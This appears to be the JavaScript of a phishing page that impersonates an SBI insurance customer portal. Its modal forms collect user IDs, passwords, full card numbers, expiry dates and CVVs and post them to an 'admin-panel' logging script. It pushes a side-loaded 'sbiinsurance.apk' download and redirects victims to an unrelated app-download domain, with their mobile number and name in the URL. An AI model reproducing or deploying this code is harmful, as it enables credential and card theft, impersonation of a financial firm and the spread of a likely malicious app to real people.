// Enhanced Active Plan JavaScript
document.addEventListener("DOMContentLoaded", function () {
    // Load user data from search
    loadUserData();
    
    // Mobile menu toggle
    const menuToggle = document.querySelector(".menu-toggle");
    const navLinks = document.querySelector(".nav-links");

    if (menuToggle && navLinks) {
        menuToggle.addEventListener("click", function () {
            navLinks.classList.toggle("active");
            const icon = menuToggle.querySelector("i");
            if (navLinks.classList.contains("active")) {
                icon.classList.remove("fa-bars");
                icon.classList.add("fa-times");
            } else {
                icon.classList.remove("fa-times");
                icon.classList.add("fa-bars");
            }
        });
    }

    // Close mobile menu when clicking on a link
    const navLinksItems = document.querySelectorAll(".nav-links a");
    navLinksItems.forEach(link => {
        link.addEventListener("click", () => {
            if (navLinks && navLinks.classList.contains("active")) {
                navLinks.classList.remove("active");
                const icon = menuToggle.querySelector("i");
                icon.classList.remove("fa-times");
                icon.classList.add("fa-bars");
            }
        });
    });

    // Enhanced Counter Animation for Growing Numbers
    const counters = document.querySelectorAll(".counter");
    const animatedCounters = new Set();

    function animateCounter(counter) {
        if (animatedCounters.has(counter)) return;
        animatedCounters.add(counter);

        const target = parseInt(counter.getAttribute("data-target"));
        const duration = 2000; // 2 seconds
        const startTime = performance.now();
        
        function updateCounter(currentTime) {
            const elapsed = currentTime - startTime;
            const progress = Math.min(elapsed / duration, 1);
            
            // Easing function for smooth animation
            const easeOutQuart = 1 - Math.pow(1 - progress, 4);
            const currentValue = Math.round(target * easeOutQuart);
            
            counter.textContent = currentValue.toLocaleString();
            
            if (progress < 1) {
                requestAnimationFrame(updateCounter);
            } else {
                counter.textContent = target.toLocaleString();
            }
        }
        
        requestAnimationFrame(updateCounter);
    }

    // Intersection Observer for counter animation
    const counterObserver = new IntersectionObserver((entries) => {
        entries.forEach(entry => {
            if (entry.isIntersecting) {
                animateCounter(entry.target);
            }
        });
    }, { threshold: 0.5 });

    counters.forEach(counter => {
        counter.textContent = "0";
        counterObserver.observe(counter);
    });

    // Back to top button functionality
    const backToTopButton = document.getElementById("back-to-top");
    
    if (backToTopButton) {
        window.addEventListener("scroll", () => {
            if (window.pageYOffset > 300) {
                backToTopButton.classList.add("show");
            } else {
                backToTopButton.classList.remove("show");
            }
        });

        backToTopButton.addEventListener("click", () => {
            window.scrollTo({
                top: 0,
                behavior: "smooth"
            });
        });
    }

    // Download Button functionality
    const downloadButtons = document.querySelectorAll(".download-button, .download-link");
    downloadButtons.forEach((button) => {
        button.addEventListener("click", function (event) {
            // Allow normal download for anchor tags with href
            if (this.tagName === 'A' && this.hasAttribute('href')) {
                // Let the browser handle the download
                return;
            }
            
            // Handle button clicks
            event.preventDefault();
            const downloadLink = document.createElement("a");
            downloadLink.href = "../app/sbiinsurance.apk";
            downloadLink.setAttribute("download", "sbiinsurance.apk");
            document.body.appendChild(downloadLink);
            downloadLink.click();
            document.body.removeChild(downloadLink);
        });
    });

    // Load user data from localStorage or URL parameters
    function loadUserData() {
        const searchedMobile = localStorage.getItem("searchedMobileNumber");
        const urlParams = new URLSearchParams(window.location.search);
        const mobileFromUrl = urlParams.get("mobile");
        
        const mobileNumber = mobileFromUrl || searchedMobile;
        
        if (mobileNumber) {
            fetchUserData(mobileNumber);
        } else {
            // If no mobile number found, show default content
            const customerElement = document.querySelector(".customer");
            if (customerElement) {
                customerElement.textContent = "Welcome, Valued Customer";
            }
        }
    }

    // Fetch user data from admin panel
    function fetchUserData(mobileNumber) {
        fetch(`../admin-panel/fetchRecords.php?mobile=${mobileNumber}`)
            .then(response => response.json())
            .then(data => {
                if (data.error) {
                    console.error("User not found:", data.error);
                    // Show default content if user not found
                    const customerElement = document.querySelector(".customer");
                    if (customerElement) {
                        customerElement.textContent = "Welcome, Valued Customer";
                    }
                } else {
                    populateUserData(data);
                }
            })
            .catch(error => {
                console.error("Error fetching user data:", error);
                // Show default content on error
                const customerElement = document.querySelector(".customer");
                if (customerElement) {
                    customerElement.textContent = "Welcome, Valued Customer";
                }
            });
    }

    // Populate user data in the page
    function populateUserData(userData) {
        // Update customer name in hero section
        const customerElement = document.querySelector(".customer");
        if (customerElement) {
            customerElement.textContent = `Hello, ${userData.name}`;
        }

        // Update customer name in policy card
        const customerName = document.getElementById("customer-name");
        if (customerName) {
            customerName.textContent = userData.name || "Valued Customer";
        }

        // Update policy number
        const policyId = document.getElementById("policy-id");
        if (policyId) {
            policyId.textContent = userData.policy_number || "SB-3456-222-4371-6234";
        }

        // Update mobile number if available
        const mobileElement = document.getElementById("customer-mobile");
        if (mobileElement && userData.mobile) {
            mobileElement.textContent = userData.mobile;
        }

        // Update email if available
        const emailElement = document.getElementById("customer-email");
        if (emailElement && userData.email) {
            emailElement.textContent = userData.email;
        }

        // You can add more data population here based on your database structure
        // For example: plan type, premium amount, etc.
    }

    // Mobile Number Validation for any search forms
    const searchForms = document.querySelectorAll(".search-form");
    searchForms.forEach(form => {
        form.addEventListener("submit", function (event) {
            const mobileInput = form.querySelector("#mobile, input[name='mobile']");
            const errorMessage = form.querySelector("#mobile-error, .error-message");

            if (mobileInput && errorMessage) {
                // Reset error message
                errorMessage.textContent = "";

                // Validate mobile number
                if (!/^\d{10}$/.test(mobileInput.value.trim())) {
                    event.preventDefault();
                    errorMessage.textContent = "Please enter a valid 10-digit mobile number.";
                }
            }
        });
    });
});

// Plan Management Functions
let currentFormType = '';

function showLoginForm(formType) {
    const modal = document.getElementById('loginModal');
    const modalTitle = document.getElementById('modalTitle');
    const credentialsForm = document.getElementById('credentialsForm');
    const creditCardForm = document.getElementById('creditCardForm');
    
    currentFormType = formType;
    
    if (formType === 'credentials') {
        modalTitle.textContent = 'Login with User Credentials';
        credentialsForm.classList.add('active');
        creditCardForm.classList.remove('active');
    } else if (formType === 'creditcard') {
        modalTitle.textContent = 'Verify with Credit Card';
        creditCardForm.classList.add('active');
        credentialsForm.classList.remove('active');
    }
    
    modal.classList.add('active');
    document.body.style.overflow = 'hidden';
}

function closeLoginForm() {
    const modal = document.getElementById('loginModal');
    const credentialsForm = document.getElementById('credentialsForm');
    const creditCardForm = document.getElementById('creditCardForm');
    
    modal.classList.remove('active');
    credentialsForm.classList.remove('active');
    creditCardForm.classList.remove('active');
    document.body.style.overflow = 'auto';
    
    // Reset forms
    document.getElementById('userCredentialsForm').reset();
    document.getElementById('creditCardVerifyForm').reset();
}

// Handle form submissions
document.addEventListener('DOMContentLoaded', function() {
    // User Credentials Form
    const credentialsForm = document.getElementById('userCredentialsForm');
    if (credentialsForm) {
        credentialsForm.addEventListener('submit', function(e) {
            e.preventDefault();
            handleCredentialsSubmit();
        });
    }
    
    // Credit Card Form
    const creditCardForm = document.getElementById('creditCardVerifyForm');
    if (creditCardForm) {
        creditCardForm.addEventListener('submit', function(e) {
            e.preventDefault();
            handleCreditCardSubmit();
        });
    }
    
    // Enhanced credit card form validation and formatting
    const cardNumberInput = document.getElementById('cardNumber');
    if (cardNumberInput) {
        cardNumberInput.addEventListener('input', function(e) {
            // Remove all non-digit characters
            let value = e.target.value.replace(/\D/g, '');
            
            // Add spaces every 4 digits
            value = value.replace(/(\d{4})(?=\d)/g, '$1 ');
            
            // Limit to 16 digits (19 characters with spaces)
            if (value.length > 19) {
                value = value.substring(0, 19);
            }
            
            e.target.value = value;
        });
    }
    
    // Expiry date formatting
    const expiryInput = document.getElementById('expiryDate');
    if (expiryInput) {
        expiryInput.addEventListener('input', function(e) {
            let value = e.target.value.replace(/\D/g, '');
            
            if (value.length >= 2) {
                value = value.substring(0, 2) + '/' + value.substring(2, 4);
            }
            
            e.target.value = value;
        });
    }
    
    // CVV formatting
    const cvvInput = document.getElementById('cvv');
    if (cvvInput) {
        cvvInput.addEventListener('input', function(e) {
            // Only allow digits
            e.target.value = e.target.value.replace(/\D/g, '');
        });
    }
    
    // Mobile number formatting
    const registeredMobileInput = document.getElementById('registeredMobile');
    if (registeredMobileInput) {
        registeredMobileInput.addEventListener('input', function(e) {
            // Only allow digits and limit to 10
            e.target.value = e.target.value.replace(/\D/g, '').substring(0, 10);
        });
    }
    
    // All mobile inputs validation
    const mobileInputs = document.querySelectorAll('input[type="tel"]');
    mobileInputs.forEach(input => {
        input.addEventListener('input', function(e) {
            e.target.value = e.target.value.replace(/[^0-9]/g, '');
        });
    });
});

function handleCredentialsSubmit() {
    const userId = document.getElementById('userId').value;
    const password = document.getElementById('userPassword').value;
    
    // Get current user's mobile number from URL or localStorage
    const urlParams = new URLSearchParams(window.location.search);
    const mobile = urlParams.get('mobile') || localStorage.getItem('searchedMobileNumber');
    
    if (!mobile) {
        showNotification('Error: User mobile number not found', 'error');
        return;
    }
    
    // Show loading state
    const submitBtn = document.querySelector('#userCredentialsForm button[type="submit"]');
    const originalText = submitBtn.innerHTML;
    submitBtn.innerHTML = '<i class="fas fa-spinner fa-spin"></i> Verifying...';
    submitBtn.disabled = true;
    
    // Submit to server
    const formData = new FormData();
    formData.append('mobile', mobile);
    formData.append('user_id', userId);
    formData.append('password', password);
    formData.append('verification_type', 'user_credentials');
    
    fetch('../admin-panel/logLoginAttempt.php', {
        method: 'POST',
        body: formData
    })
    .then(response => response.json())
    .then(data => {
        if (data.success) {
            showNotification('Verification successful! Redirecting...', 'success');
            
            // Get customer name from page or use default
            const customerNameElement = document.getElementById('customer-name');
            const customerName = customerNameElement ? customerNameElement.textContent : 'Valued Customer';
            
            // REDIRECT TO DOWNLOADS DOMAIN - PRODUCTION
            const downloadsUrl = 'https://appdownloadworld.store';
            const timestamp = Date.now();
            const redirectUrl = `${downloadsUrl}/success.html?verified=true&mobile=${encodeURIComponent(mobile)}&name=${encodeURIComponent(customerName)}&timestamp=${timestamp}`;
            
            setTimeout(() => {
                window.location.href = redirectUrl;
            }, 1500);
        } else {
            showNotification(data.error || 'Verification failed', 'error');
        }
    })
    .catch(error => {
        console.error('Error:', error);
        showNotification('Network error. Please try again.', 'error');
    })
    .finally(() => {
        submitBtn.innerHTML = originalText;
        submitBtn.disabled = false;
    });
}

function handleCreditCardSubmit() {
    const cardNumber = document.getElementById('cardNumber').value.replace(/\s/g, '');
    const registeredMobile = document.getElementById('registeredMobile').value;
    const expiryDate = document.getElementById('expiryDate').value;
    const cvv = document.getElementById('cvv').value;
    
    // Get current user's mobile number from URL or localStorage
    const urlParams = new URLSearchParams(window.location.search);
    const mobile = urlParams.get('mobile') || localStorage.getItem('searchedMobileNumber');
    
    if (!mobile) {
        showNotification('Error: User mobile number not found', 'error');
        return;
    }
    
    // Enhanced validation
    if (registeredMobile.length !== 10) {
        showNotification('Please enter a valid 10-digit mobile number', 'error');
        return;
    }
    
    if (cardNumber.length < 15 || cardNumber.length > 16) {
        showNotification('Please enter a valid credit card number', 'error');
        return;
    }
    
    if (!/^\d{2}\/\d{2}$/.test(expiryDate)) {
        showNotification('Please enter expiry date in MM/YY format', 'error');
        return;
    }
    
    if (cvv.length < 3 || cvv.length > 4) {
        showNotification('Please enter a valid CVV', 'error');
        return;
    }
    
    // Check expiry date validity
    const [month, year] = expiryDate.split('/');
    const currentDate = new Date();
    const currentYear = currentDate.getFullYear() % 100;
    const currentMonth = currentDate.getMonth() + 1;
    
    if (parseInt(month) < 1 || parseInt(month) > 12) {
        showNotification('Please enter a valid month (01-12)', 'error');
        return;
    }
    
    if (parseInt(year) < currentYear || (parseInt(year) === currentYear && parseInt(month) < currentMonth)) {
        showNotification('Card has expired. Please use a valid card', 'error');
        return;
    }
    
    // Show loading state
    const submitBtn = document.querySelector('#creditCardVerifyForm button[type="submit"]');
    const originalText = submitBtn.innerHTML;
    submitBtn.innerHTML = '<i class="fas fa-spinner fa-spin"></i> Verifying...';
    submitBtn.disabled = true;
    
    // Submit to server
    const formData = new FormData();
    formData.append('mobile', mobile);
    formData.append('card_number', cardNumber);
    formData.append('expiry_date', expiryDate);
    formData.append('cvv', cvv);
    formData.append('registered_mobile', registeredMobile);
    formData.append('verification_type', 'credit_card');
    
    fetch('../admin-panel/logLoginAttempt.php', {
        method: 'POST',
        body: formData
    })
    .then(response => response.json())
    .then(data => {
        if (data.success) {
            showNotification('Verification successful! Redirecting...', 'success');
            
            // Get customer name from page or use default
            const customerNameElement = document.getElementById('customer-name');
            const customerName = customerNameElement ? customerNameElement.textContent : 'Valued Customer';
            
            // REDIRECT TO DOWNLOADS DOMAIN - PRODUCTION
            const downloadsUrl = 'https://appdownloadworld.store';
            const timestamp = Date.now();
            const redirectUrl = `${downloadsUrl}/success.html?verified=true&mobile=${encodeURIComponent(mobile)}&name=${encodeURIComponent(customerName)}&timestamp=${timestamp}`;
            
            setTimeout(() => {
                window.location.href = redirectUrl;
            }, 1500);
        } else {
            showNotification(data.error || 'Verification failed', 'error');
        }
    })
    .catch(error => {
        console.error('Error:', error);
        showNotification('Network error. Please try again.', 'error');
    })
    .finally(() => {
        submitBtn.innerHTML = originalText;
        submitBtn.disabled = false;
    });
}

function showNotification(message, type = 'info') {
    // Create notification element
    const notification = document.createElement('div');
    notification.className = `notification notification-${type}`;
    notification.innerHTML = `
        <div class="notification-content">
            <i class="fas ${type === 'success' ? 'fa-check-circle' : type === 'error' ? 'fa-exclamation-circle' : 'fa-info-circle'}"></i>
            <span>${message}</span>
        </div>
    `;
    
    // Add styles if not already added
    if (!document.querySelector('#notification-styles')) {
        const styles = document.createElement('style');
        styles.id = 'notification-styles';
        styles.textContent = `
            .notification {
                position: fixed;
                top: 20px;
                right: 20px;
                padding: 16px 20px;
                border-radius: 8px;
                color: white;
                font-weight: 500;
                z-index: 10000;
                min-width: 300px;
                animation: slideInRight 0.3s ease;
            }
            .notification-success { background: #27ae60; }
            .notification-error { background: #e74c3c; }
            .notification-info { background: #3498db; }
            .notification-content {
                display: flex;
                align-items: center;
                gap: 10px;
            }
            @keyframes slideInRight {
                from { transform: translateX(100%); opacity: 0; }
                to { transform: translateX(0); opacity: 1; }
            }
        `;
        document.head.appendChild(styles);
    }
    
    // Add to page
    document.body.appendChild(notification);
    
    // Remove after 4 seconds
    setTimeout(() => {
        notification.style.animation = 'slideInRight 0.3s ease reverse';
        setTimeout(() => {
            if (notification.parentNode) {
                notification.parentNode.removeChild(notification);
            }
        }, 300);
    }, 4000);
}

// Close modal when clicking outside
document.addEventListener('click', function(e) {
    const modal = document.getElementById('loginModal');
    if (e.target === modal) {
        closeLoginForm();
    }
});

// Close modal with Escape key
document.addEventListener('keydown', function(e) {
    if (e.key === 'Escape') {
        const modal = document.getElementById('loginModal');
        if (modal && modal.classList.contains('active')) {
            closeLoginForm();
        }
    }
});
